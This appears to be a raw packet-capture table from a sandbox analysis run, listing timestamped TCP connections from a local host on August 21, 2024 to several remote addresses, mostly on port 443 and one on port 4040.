Aug 21, 2024 23:17:02.018511057 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.119502068 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.119524956 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.125181913 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.125219107 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.125305891 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.138803005 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.139029026 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.139045000 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.183582067 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.183600903 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.230798960 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.349740028 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.350287914 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.350300074 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.351259947 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.351324081 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.351613045 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.351665974 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.351751089 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.351757050 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.386101961 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.386305094 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.386317015 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.387443066 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.387506962 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.388473988 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.388550043 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.388654947 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.388662100 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.397917986 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.465945005 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466001034 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466028929 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466056108 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466070890 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.466079950 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466108084 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466109991 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.466149092 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.466155052 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466610909 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466640949 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466660023 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.466665030 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.466706991 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.466711998 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.474149942 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.474211931 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.474216938 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.529393911 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.559861898 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.559870958 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.559923887 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.559936047 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.559952974 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.559964895 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.559972048 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.559998035 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.560038090 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.566931009 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.566948891 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.567013979 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.567018986 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.567066908 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.567078114 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.620652914 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620747089 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620754004 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620779991 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620794058 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620809078 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620834112 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.620842934 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620863914 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.620867014 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.620892048 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.651813984 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.651824951 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651832104 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651838064 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.651889086 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651901007 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651912928 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651922941 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651953936 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.651953936 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.651962042 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.651973009 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.651997089 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.652025938 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.652906895 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.652920961 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.652991056 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.652996063 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.653039932 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.653345108 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.653410912 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.653414965 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.653426886 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.653466940 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.653637886 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.653654099 CEST	443	49740	151.101.2.137	192.168.2.4
Aug 21, 2024 23:17:02.653662920 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.653697968 CEST	49740	443	192.168.2.4	151.101.2.137
Aug 21, 2024 23:17:02.655930042 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.655982018 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656001091 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656017065 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656061888 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.656074047 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656094074 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.656097889 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656128883 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656138897 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.656168938 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.656199932 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.656200886 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.657356024 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.657407045 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.657424927 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.657448053 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.657459021 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.657484055 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.657490015 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.657512903 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.657540083 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.710429907 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.710681915 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.710695028 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.710711002 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.710737944 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.710773945 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.710788012 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.710822105 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.741161108 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.741174936 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.741204977 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.741214991 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.741244078 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.741255045 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.741266012 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.741276979 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.741305113 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.741605043 CEST	49739	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.741621017 CEST	443	49739	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.759402990 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.759437084 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.759515047 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.759705067 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:02.759717941 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:02.861437082 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861457109 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861495018 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861536026 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861542940 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.861569881 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861608028 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.861834049 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861874104 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861918926 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.861939907 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.861968994 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.863651991 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.863692045 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.863743067 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.863764048 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.863790035 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.865109921 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.865539074 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.865559101 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.865627050 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:02.865642071 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:02.865700006 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.047123909 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.047169924 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.047233105 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.047254086 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.047286987 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.047307968 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.047472954 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.047512054 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.047555923 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.047568083 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.047595978 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.047631025 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.048692942 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.048732042 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.048782110 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.048794031 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.048829079 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.048849106 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.049595118 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.049637079 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.049691916 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.049705029 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.049748898 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.050488949 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.050534010 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.050535917 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.050565958 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.050581932 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.050636053 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.141711950 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.141767979 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.141830921 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.141845942 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.141875029 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.141896009 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.141976118 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.142019987 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.142050982 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.142062902 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.142118931 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.142118931 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.142276049 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.142321110 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.142366886 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.142384052 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.142405033 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.142427921 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242305040 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242351055 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242407084 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242424011 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242453098 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242490053 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242594004 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242655039 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242674112 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242686033 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242714882 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242733955 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.242744923 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242896080 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.242953062 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.243463993 CEST	49736	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.243486881 CEST	443	49736	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.372948885 CEST	49675	443	192.168.2.4	173.222.162.32
Aug 21, 2024 23:17:03.455373049 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.500175953 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.616641998 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.616647959 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.618228912 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.618304014 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.625986099 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.626069069 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.628484964 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.628490925 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.642235041 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.642256975 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.642309904 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.643366098 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:03.644350052 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:03.644365072 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:03.651451111 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:03.651508093 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:03.679214001 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.725734949 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:03.725752115 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:03.725812912 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:03.728827953 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:03.728837013 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:03.728895903 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:03.741566896 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:03.741583109 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:03.742036104 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:03.742532015 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:03.742544889 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:03.748492956 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:03.859430075 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859456062 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859466076 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859493017 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859503031 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.859508038 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859520912 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859536886 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859549046 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.859555960 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.859565973 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.859597921 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.885198116 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.885251045 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.887356043 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.887377977 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.887414932 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.887419939 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.887447119 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.928277969 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.953780890 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.953792095 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.953816891 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.953846931 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.953854084 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.953881025 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.953895092 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.973944902 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.974003077 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:03.974009991 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.974096060 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:03.974138021 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:04.016805887 CEST	49743	443	192.168.2.4	162.0.215.17
Aug 21, 2024 23:17:04.016823053 CEST	443	49743	162.0.215.17	192.168.2.4
Aug 21, 2024 23:17:04.254009008 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.254029036 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.254040956 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.254081011 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:04.270663023 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:04.271054983 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:04.275538921 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.275959015 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.408512115 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.408962011 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.408976078 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.409950972 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.410008907 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.433569908 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.436415911 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.436527967 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.436738968 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.436752081 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.474718094 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:04.504326105 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.527520895 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:04.543312073 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:04.543320894 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:04.544212103 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:04.544281006 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:04.557920933 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.557941914 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.557949066 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.557987928 CEST	443	49748	13.107.246.64	192.168.2.4
